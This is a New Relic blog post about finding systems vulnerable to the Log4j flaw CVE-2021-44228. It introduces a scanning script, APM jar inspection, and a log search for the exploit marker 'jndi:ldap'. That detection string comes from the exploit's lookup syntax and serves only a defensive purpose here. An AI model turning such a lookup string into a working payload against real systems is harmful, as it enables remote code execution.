How to identify systems with vulnerable log4j

This post focuses on how you can use New Relic to help you identify some of your systems vulnerable to log4j vulnerability CVE 2021-44228. As of December 14, 2021, we recommend upgrading Apache Log4j to version 2.16.0 as soon as possible.

New Relic is a product built by developers for developers, so when news broke of the Apache Log4j vulnerability, we immediately kicked off two internal discussions: 

First, we initiated a security response process to investigate the security of our own systems. You can read more about that in Kymberlee Price's recent blog post.

Second, we asked ourselves “how can we help our customers investigate the security of their systems?” We’re pleased to report that New Relic can help you expedite your own response to the log4j incident in three ways, described below.

Announcing: NR-find-log-4j an open-source log4j scanning script

This is a new open-source script we’ve just released to help anyone scan their New Relic-monitored services to help you identify where the log4j-core may be being used within your own systems.

More specifically, this script can scan your New Relic account(s) for Java services that report usage of log4j-core, and generate a manifest containing each suspect service with the version of log4j-core reported by New Relic APM.

Note that this script may generate false positives and false negatives, and doesn't provide a guarantee or proof of non-vulnerability. This script is intended to be one resource among the many you may use to assist with your own investigation and identification of potentially vulnerable systems.

Download the script from GitHub and use it to help identify potential application security risks

Using New Relic APM to identify at-risk agents or applications

New Relic’s APM Environment functionality can help you identify if your agents or some of your applications are at risk due to inclusion of a vulnerable version of log4j. When viewing jars loaded in the jvm runtime, you can identify if log4j-core 2.x is present, as well as what version of the New Relic agent is in use, and help your security response process to identify use of log4j in your systems.

Using New Relic Log Management to identify attempted log4j exploits

You can use New Relic Log Management to help search your existing log records for attempted exploits of the recent log4j security vulnerability. Your log records may show a known attempt to exploit this vulnerability and may be helpful in tracking down malicious actors within your services.
 

• First, select Logs in New Relic One. 
• In the search bar Find logs where, enter "jndi:ldap"
• Select Query logs. Any logs that include jndi:ldap will be displayed. 

We hope these three capabilities will help you and your organization investigate and manage any security risks presented by the log4j CVE-2021-44228 vulnerability.